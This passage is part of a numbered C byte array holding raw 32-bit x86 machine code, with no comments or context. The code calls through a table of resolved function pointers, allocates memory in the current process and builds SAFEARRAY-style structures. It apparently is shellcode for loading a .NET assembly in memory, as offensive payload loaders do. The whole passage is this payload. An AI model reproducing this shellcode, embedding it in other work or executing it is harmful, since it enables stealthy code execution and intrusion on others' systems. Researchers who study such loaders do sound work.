510 0xa4, 0x8b, 0x5d, 0xa0, 0x8b, 0x4d, 0xe4, 0x01, 0xcb, 0x8d, 0x4d, 0x98,
511 0x89, 0x4c, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x08, 0x89, 0x5c, 0x24, 0x04,
512 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89,
513 0x45, 0xbc, 0x8b, 0x55, 0xa0, 0x8b, 0x45, 0xa4, 0x01, 0xd0, 0x89, 0x45,
514 0xa0, 0xe9, 0xed, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xa0, 0x85, 0xc0, 0x74,
515 0x70, 0x8b, 0x45, 0x08, 0x8b, 0x58, 0x6c, 0x8b, 0x45, 0xa0, 0x89, 0x85,
516 0xc4, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x74, 0xff, 0xd0,
517 0x8b, 0x8d, 0xc4, 0xfc, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x08, 0xc7, 0x44,
518 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0xff, 0xd3, 0x83,
519 0xec, 0x0c, 0x89, 0x45, 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x74, 0x36, 0xc7,
520 0x45, 0x98, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb8,
521 0x00, 0x00, 0x00, 0x8b, 0x55, 0xa0, 0x8d, 0x4d, 0x98, 0x89, 0x4c, 0x24,
522 0x0c, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x55, 0xe4, 0x89, 0x54, 0x24, 0x04,
523 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89,
524 0x45, 0xe0, 0xeb, 0x01, 0x90, 0x83, 0x7d, 0xe4, 0x00, 0x0f, 0x84, 0xcd,
525 0x00, 0x00, 0x00, 0x8b, 0x45, 0xa0, 0x85, 0xc0, 0x0f, 0x84, 0xc2, 0x00,
526 0x00, 0x00, 0x8b, 0x45, 0xa0, 0x89, 0x85, 0xc8, 0xfc, 0xff, 0xff, 0x8b,
527 0x45, 0x08, 0x8d, 0x90, 0x30, 0x0d, 0x00, 0x00, 0x8b, 0x45, 0xd0, 0x89,
528 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00, 0x00, 0x00, 0xc7,
529 0x44, 0x24, 0x10, 0x00, 0x30, 0x00, 0x00, 0x8d, 0x85, 0xc8, 0xfc, 0xff,
530 0xff, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00,
531 0x00, 0x89, 0x54, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff,
532 0xe8, 0xdf, 0x41, 0x00, 0x00, 0x89, 0x45, 0xb8, 0x83, 0x7d, 0xb8, 0x00,
533 0x78, 0x28, 0x8b, 0x55, 0xa0, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x30, 0x0d,
534 0x00, 0x00, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x55, 0xe4, 0x89, 0x54, 0x24,
535 0x04, 0x89, 0x04, 0x24, 0xe8, 0x79, 0x3b, 0x00, 0x00, 0xc7, 0x45, 0xe0,
536 0x01, 0x00, 0x00, 0x00, 0xeb, 0x07, 0xc7, 0x45, 0xe0, 0x00, 0x00, 0x00,
537 0x00, 0x8b, 0x45, 0xa0, 0x89, 0x44, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04,
538 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x89, 0x04, 0x24, 0xe8, 0x21,
539 0x3b, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x58, 0x78, 0x8b, 0x45, 0x08,
540 0x8b, 0x40, 0x74, 0xff, 0xd0, 0x8b, 0x55, 0xe4, 0x89, 0x54, 0x24, 0x08,
541 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0xff,
542 0xd3, 0x83, 0xec, 0x0c, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xbc, 0x00, 0x00,
543 0x00, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
544 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xbc, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc8,
545 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45, 0x08, 0x8b,
546 0x80, 0xbc, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xcc, 0x89, 0x14, 0x24, 0xff,
547 0xd0, 0x83, 0xec, 0x04, 0x83, 0x7d, 0xe0, 0x00, 0x0f, 0x84, 0xac, 0x00,
548 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x04, 0x02, 0x00, 0x00, 0x83,
549 0xf8, 0x03, 0x0f, 0x85, 0x9a, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
550 0x80, 0x30, 0x0d, 0x00, 0x00, 0x89, 0x45, 0xb4, 0x8b, 0x45, 0x08, 0x8b,
551 0x90, 0x2c, 0x0d, 0x00, 0x00, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00, 0x89,
552 0xc3, 0x8b, 0x45, 0x08, 0x8d, 0x88, 0x18, 0x0d, 0x00, 0x00, 0x8b, 0x45,
553 0x08, 0x8d, 0x90, 0x08, 0x0d, 0x00, 0x00, 0x89, 0x5c, 0x24, 0x0c, 0x8b,
554 0x45, 0xb4, 0x89, 0x44, 0x24, 0x08, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14,
555 0x24, 0xe8, 0x48, 0x45, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x2c,
556 0x8b, 0x40, 0x28, 0x8b, 0x4d, 0x08, 0x81, 0xc1, 0x00, 0x0c, 0x00, 0x00,
557 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x89, 0x0c, 0x24, 0xe8,
558 0x12, 0x42, 0x00, 0x00, 0x89, 0x45, 0xa8, 0x89, 0x55, 0xac, 0x8b, 0x45,
559 0xb4, 0x8b, 0x90, 0x1c, 0x05, 0x00, 0x00, 0x8b, 0x80, 0x18, 0x05, 0x00,
560 0x00, 0x89, 0xc3, 0x33, 0x5d, 0xa8, 0x89, 0xde, 0x89, 0xd0, 0x33, 0x45,
561 0xac, 0x89, 0xc7, 0x89, 0xf8, 0x09, 0xf0, 0x85, 0xc0, 0x74, 0x07, 0xb8,
562 0x00, 0x00, 0x00, 0x00, 0xeb, 0x03, 0x8b, 0x45, 0xe0, 0x8d, 0x65, 0xf4,
563 0x5b, 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x56, 0x53, 0x81, 0xec,
564 0x50, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xc7,
565 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xd4,
566 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x22, 0x01, 0x00, 0x00, 0x8b,
567 0x45, 0x08, 0x8b, 0x80, 0xd4, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b,
568 0x4d, 0x08, 0x8d, 0x99, 0x34, 0x08, 0x00, 0x00, 0x8b, 0x4d, 0x08, 0x81,
569 0xc1, 0x24, 0x08, 0x00, 0x00, 0x89, 0x54, 0x24, 0x08, 0x89, 0x5c, 0x24,
570 0x04, 0x89, 0x0c, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf4,
571 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0xde, 0x00, 0x00, 0x00, 0x8b, 0x45,
572 0x0c, 0x8d, 0x50, 0x0c, 0x8d, 0x85, 0xd4, 0xfd, 0xff, 0xff, 0x89, 0x44,
573 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
574 0xe8, 0x6a, 0xef, 0xff, 0xff, 0x8b, 0x45, 0x10, 0x8b, 0x00, 0x8b, 0x00,
575 0x8b, 0x40, 0x0c, 0x8b, 0x55, 0x10, 0x8d, 0x5a, 0x04, 0x8b, 0x55, 0x08,
576 0x8d, 0x8a, 0x44, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b, 0x12, 0x89,
577 0x5c, 0x24, 0x0c, 0x89, 0x4c, 0x24, 0x08, 0x8d, 0x8d, 0xd4, 0xfd, 0xff,
578 0xff, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
579 0x10, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x72, 0x8b, 0x45,
580 0x10, 0x8b, 0x40, 0x04, 0x8b, 0x00, 0x8b, 0x40, 0x28, 0x8b, 0x55, 0x10,
581 0x8b, 0x52, 0x04, 0x8d, 0x4d, 0xd4, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14,
582 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4,
583 0x00, 0x78, 0x5e, 0x8b, 0x45, 0xd4, 0x85, 0xc0, 0x74, 0x57, 0x8b, 0x45,
584 0x10, 0x8b, 0x40, 0x04, 0x8b, 0x00, 0x8b, 0x40, 0x24, 0x8b, 0x55, 0x10,
585 0x8d, 0x72, 0x08, 0x8b, 0x55, 0x08, 0x8d, 0x9a, 0x64, 0x08, 0x00, 0x00,
586 0x8b, 0x55, 0x08, 0x8d, 0x8a, 0x54, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x10,
587 0x8b, 0x52, 0x04, 0x89, 0x74, 0x24, 0x0c, 0x89, 0x5c, 0x24, 0x08, 0x89,
588 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89,
589 0x45, 0xf4, 0xeb, 0x15, 0x8b, 0x45, 0x10, 0xc7, 0x40, 0x04, 0x00, 0x00,
590 0x00, 0x00, 0xeb, 0x09, 0x8b, 0x45, 0x10, 0xc7, 0x00, 0x00, 0x00, 0x00,
591 0x00, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x0d, 0x8b, 0x45, 0x08, 0x8b, 0x80,
592 0xd4, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x44, 0x8b, 0x45, 0x08, 0x8b,
593 0x80, 0xd0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8d, 0x5a, 0x08, 0x8b,
594 0x55, 0x08, 0x8d, 0x8a, 0x64, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x81,
595 0xc2, 0x54, 0x08, 0x00, 0x00, 0x89, 0x5c, 0x24, 0x10, 0x89, 0x4c, 0x24,
596 0x0c, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00,
597 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec,
598 0x14, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x79, 0x14, 0x8b, 0x45,
599 0x10, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00,
600 0x00, 0xe9, 0x4e, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x08,
601 0x8b, 0x00, 0x8b, 0x40, 0x28, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x08, 0x89,
602 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x83, 0x7d,
603 0xf4, 0x00, 0x0f, 0x88, 0x25, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x0f,
604 0xb6, 0x80, 0x0c, 0x01, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x2b, 0x8b, 0x45,
605 0x10, 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x34, 0x8b, 0x55, 0x10,
606 0x8d, 0x4a, 0x0c, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x08, 0x89, 0x4c, 0x24,
607 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xf4,
608 0xe9, 0x85, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x01,
609 0x00, 0x00, 0x8d, 0x85, 0xd4, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08,
610 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xb0,
611 0xed, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00, 0x00, 0x00,
612 0x8d, 0x95, 0xd4, 0xfd, 0xff, 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
613 0xec, 0x04, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x08, 0x8b,
614 0x00, 0x8b, 0x40, 0x30, 0x8b, 0x55, 0x10, 0x8d, 0x4a, 0x0c, 0x8b, 0x55,
615 0x10, 0x8b, 0x52, 0x08, 0x89, 0x4c, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08,
616 0x00, 0x00, 0x00, 0x00, 0x8b, 0x4d, 0xe8, 0x89, 0x4c, 0x24, 0x04, 0x89,
617 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89, 0x45, 0xf4, 0x8b, 0x45,
618 0x08, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe8, 0x89, 0x14,
619 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88,
620 0x5d, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x0c, 0x8b, 0x00,
621 0x8b, 0x00, 0x8b, 0x55, 0x10, 0x8d, 0x5a, 0x10, 0x8b, 0x55, 0x08, 0x8d,
622 0x8a, 0x74, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x0c, 0x89,
623 0x5c, 0x24, 0x08, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0,
624 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88,
625 0x21, 0x01, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x00, 0x00, 0x00, 0x00, 0x8b,
626 0x45, 0x0c, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x89, 0x45, 0xd8, 0x8b,
627 0x45, 0x08, 0x8b, 0x80, 0x84, 0x00, 0x00, 0x00, 0x8d, 0x55, 0xd8, 0x89,
628 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0xc7,
629 0x04, 0x24, 0x11, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89,
630 0x45, 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x0f, 0x84, 0xdd, 0x00, 0x00, 0x00,
631 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x40,
632 0x0c, 0x89, 0x45, 0xe0, 0xeb, 0x1e, 0x8b, 0x55, 0xe0, 0x8b, 0x45, 0xf0,
633 0x01, 0xc2, 0x8b, 0x4d, 0x0c, 0x8b, 0x45, 0xf0, 0x01, 0xc8, 0x05, 0x28,
634 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x00, 0x88, 0x02, 0x83, 0x45, 0xf0, 0x01,
635 0x8b, 0x45, 0x0c, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x39, 0x45, 0xf0,
636 0x72, 0xd4, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x10, 0x8b, 0x00, 0x8b, 0x80,
637 0xb4, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8d, 0x4a, 0x14, 0x8b, 0x55,
638 0x10, 0x8b, 0x52, 0x10, 0x89, 0x4c, 0x24, 0x08, 0x8b, 0x4d, 0xe4, 0x89,
639 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89,
640 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0,
641 0x89, 0x45, 0xec, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
642 0xe4, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xe0, 0xeb, 0x2e, 0x8b, 0x55, 0x0c,
643 0x8b, 0x45, 0xf0, 0x01, 0xd0, 0x05, 0x28, 0x05, 0x00, 0x00, 0xc6, 0x00,
644 0x00, 0x8b, 0x55, 0xe0, 0x8b, 0x45, 0xf0, 0x01, 0xc2, 0x8b, 0x4d, 0x0c,
645 0x8b, 0x45, 0xf0, 0x01, 0xc8, 0x05, 0x28, 0x05, 0x00, 0x00, 0x0f, 0xb6,
646 0x00, 0x88, 0x02, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x45, 0x0c, 0x8b, 0x80,
647 0x24, 0x05, 0x00, 0x00, 0x39, 0x45, 0xf0, 0x72, 0xc4, 0x8b, 0x45, 0x08,
648 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe4, 0x89, 0x14, 0x24,
649 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45, 0xec, 0x8d, 0x65, 0xf8, 0x5b,
650 0x5e, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x81, 0xec, 0xc4, 0x02, 0x00,
651 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x00,
652 0x00, 0x00, 0x00, 0xc7, 0x45, 0x98, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45,
653 0x9c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa0, 0x00, 0x00, 0x00, 0x00,
654 0xc7, 0x45, 0xa4, 0x00, 0x00, 0x00, 0x00, 0x66, 0xc7, 0x45, 0x82, 0x00,
655 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x85, 0x0c,
656 0x03, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x14, 0x8b, 0x00, 0x8b,
657 0x40, 0x40, 0x8b, 0x55, 0x10, 0x8d, 0x4a, 0x1c, 0x8b, 0x55, 0x10, 0x8b,
658 0x52, 0x14, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
659 0xec, 0x08, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x88, 0xcd,
660 0x02, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x1c, 0x8b, 0x00, 0x8b,
661 0x40, 0x48, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x1c, 0x8d, 0x4d, 0xdc, 0x89,
662 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89,
663 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x88, 0x47, 0x05, 0x00, 0x00,
664 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x94, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xdc,
665 0x8d, 0x8d, 0x78, 0xff, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x08, 0xc7, 0x44,
666 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
667 0xec, 0x0c, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x98, 0x00,
668 0x00, 0x00, 0x8b, 0x55, 0xdc, 0x8d, 0x8d, 0x7c, 0xff, 0xff, 0xff, 0x89,
669 0x4c, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89,
670 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf0, 0x8b, 0x85,
671 0x7c, 0xff, 0xff, 0xff, 0x8b, 0x95, 0x78, 0xff, 0xff, 0xff, 0x29, 0xd0,
672 0x83, 0xc0, 0x01, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00, 0x0f, 0x84,
673 0xa3, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x88, 0x00, 0x00,
674 0x00, 0xc7, 0x44, 0x24, 0x08, 0x01, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
675 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24, 0x0c, 0x00, 0x00, 0x00,
676 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0x0f,
677 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x84, 0xd8, 0x00,
678 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x04, 0x00, 0x00, 0x8d,
679 0x85, 0x76, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24,
680 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x6b, 0xea, 0xff, 0xff,
681 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x8d, 0x95, 0x70,
682 0xfd, 0xff, 0xff, 0x89, 0x54, 0x24, 0x04, 0x8d, 0x95, 0x76, 0xfd, 0xff,
683 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xe4,
684 0x66, 0xc7, 0x45, 0xa8, 0x08, 0x20, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x88,
685 0x00, 0x00, 0x00, 0x8b, 0x95, 0x70, 0xfd, 0xff, 0xff, 0x89, 0x54, 0x24,
686 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24,
687 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xb0,
688 0xc7, 0x45, 0x84, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x4a, 0x8b, 0x45, 0x08,
689 0x8b, 0x98, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c,
690 0x00, 0x00, 0x00, 0x8b, 0x55, 0x84, 0x8d, 0x0c, 0x95, 0x00, 0x00, 0x00,
691 0x00, 0x8b, 0x55, 0xe4, 0x01, 0xca, 0x8b, 0x12, 0x89, 0x14, 0x24, 0xff,
692 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x55, 0xb0, 0x89, 0x44, 0x24, 0x08, 0x8d,
693 0x45, 0x84, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd3, 0x83,
694 0xec, 0x0c, 0x8b, 0x45, 0x84, 0x83, 0xc0, 0x01, 0x89, 0x45, 0x84, 0x8b,
695 0x45, 0x84, 0x8b, 0x95, 0x70, 0xfd, 0xff, 0xff, 0x39, 0xd0, 0x72, 0xa9,
696 0xeb, 0x68, 0x66, 0xc7, 0x45, 0xa8, 0x08, 0x20, 0x8b, 0x45, 0x08, 0x8b,
697 0x80, 0x88, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x01, 0x00, 0x00,
698 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24,
699 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xb0,
700 0xc7, 0x45, 0x84, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x98,
701 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00, 0x00,
702 0x00, 0x8d, 0x55, 0x82, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
703 0x8b, 0x55, 0xb0, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x45, 0x84, 0x89, 0x44,
704 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd3, 0x83, 0xec, 0x0c, 0xc7, 0x45,
705 0x84, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x8c, 0x00,
706 0x00, 0x00, 0x8d, 0x55, 0xa8, 0x89, 0x54, 0x24, 0x08, 0x8d, 0x55, 0x84,
707 0x89, 0x54, 0x24, 0x04, 0x8b, 0x55, 0xf4, 0x89, 0x14, 0x24, 0xff, 0xd0,
708 0x83, 0xec, 0x0c, 0x66, 0xc7, 0x45, 0x98, 0x01, 0x00, 0xc7, 0x45, 0xa0,
709 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x1c, 0x8b, 0x00,
710 0x8b, 0x80, 0x94, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x1c,
711 0x8d, 0x4d, 0x88, 0x89, 0x4c, 0x24, 0x18, 0x8b, 0x4d, 0xf4, 0x89, 0x4c,
712 0x24, 0x14, 0x8b, 0x4d, 0x98, 0x89, 0x4c, 0x24, 0x04, 0x8b, 0x4d, 0x9c,
713 0x89, 0x4c, 0x24, 0x08, 0x8b, 0x4d, 0xa0, 0x89, 0x4c, 0x24, 0x0c, 0x8b,
714 0x4d, 0xa4, 0x89, 0x4c, 0x24, 0x10, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
715 0xec, 0x1c, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x84, 0xd4,
716 0x02, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00,
717 0x8b, 0x55, 0xb0, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b,
718 0x45, 0x08, 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xf4, 0x89,
719 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xe9, 0xa7, 0x02, 0x00, 0x00,
720 0x8b, 0x45, 0x10, 0xc7, 0x40, 0x1c, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x98,
721 0x02, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x02, 0x00, 0x00,
722 0x8d, 0x85, 0x76, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54,
723 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x66, 0xe8, 0xff,
724 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00, 0x00, 0x00, 0x8d, 0x95,
725 0x76, 0xfd, 0xff, 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
726 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00,
727 0x00, 0x00, 0xe9, 0x51, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90,
728 0x0c, 0x03, 0x00, 0x00, 0x8d, 0x85, 0x76, 0xfd, 0xff, 0xff, 0x89, 0x44,
729 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
730 0xe8, 0x1a, 0xe8, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00,
731 0x00, 0x00, 0x8d, 0x95, 0x76, 0xfd, 0xff, 0xff, 0x89, 0x14, 0x24, 0xff,
732 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xe8, 0x83, 0x7d, 0xe8, 0x00, 0x0f,
733 0x84, 0xf2, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x14, 0x8b,
734 0x00, 0x8b, 0x40, 0x44, 0x8b, 0x55, 0x10, 0x8d, 0x4a, 0x18, 0x8b, 0x55,
735 0x10, 0x8b, 0x52, 0x14, 0x89, 0x4c, 0x24, 0x08, 0x8b, 0x4d, 0xec, 0x89,
736 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89,
